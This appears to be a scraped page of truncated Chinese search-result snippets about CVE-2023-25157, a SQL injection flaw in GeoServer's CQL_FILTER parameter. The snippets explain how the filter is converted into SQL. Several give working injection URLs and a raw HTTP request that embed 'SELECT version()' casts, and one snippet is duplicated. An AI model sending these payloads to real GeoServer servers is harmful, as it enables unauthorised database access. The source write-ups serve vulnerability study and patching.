数据库的 SQL 查询语句,生成数据库的查询语句后,会对判断是否存在 CQL_FILTER查询条件,如果是存在则开始处理用户输入的 CQL_FILTER条件,由 encodeToString(Filter filter)将CQL_FILTER转换为 SQL 语句,再由 FilterToSQL filter拼接到 WHETE后面,最后 JDBCFeatureReader的this.runQuery执行带有注入的 SQL 语句,完成注入...
CVE-2023-25157:GeoServer OGC Filter SQL注入漏洞 sqlfiltergeoserver漏洞配置 GeoServer是OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作,通过 GeoServer 可以比较容易的在用户之间迅速共享空间地理信息。 Timeline Sec 2023/12/19 3.3K0 网络要...
service=wfs&version=1.0.0&request=GetFeature&typeName=gwpd:chinamap11&CQL_FILTER=strStartsWith%28Vatican City%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+trueHTTP/1.1Host:192.168.254.170:9999Cache-Control:max-age=0Upgra...
利用这些已知参数,发送如下URL即可触发SQL注入漏洞: http://your-ip:8080/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+integer%29%29+--+%27...
利用这些已知参数,发送如下URL即可触发SQL注入漏洞: http://your-ip:8080/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+integer%29%29+--+%27...
原创Paper | GeoServer SQL 注入漏洞分析(CVE-2023-25157) 作者:wh0am1i@知道创宇404实验室 日期:2023年6月29日 0x01 GeoServer & GeoTools 参考资料 GeoServer 是一个用 Java 编写的开源软件服务器,允许用户共享和编辑地理空间数据...GeoServer 支持 OGC 过滤器表达式语言和 OGC 通用查询语言 (CQL),主要影响...
在请求中,可通过cql_filter参数输入过滤条件,对图层进行查询,查询的格式可移步http://docs.geoserver.org/latest/en/user/tutorials/cql/cql_tutorial.html#cql-tutorial看看相关具体的说明,在此我简单的举两个例子来说明。 示例URL: http://localhost:8088/geoserver/lzugis/wfs?service=WFS&request=GetFeature&ver...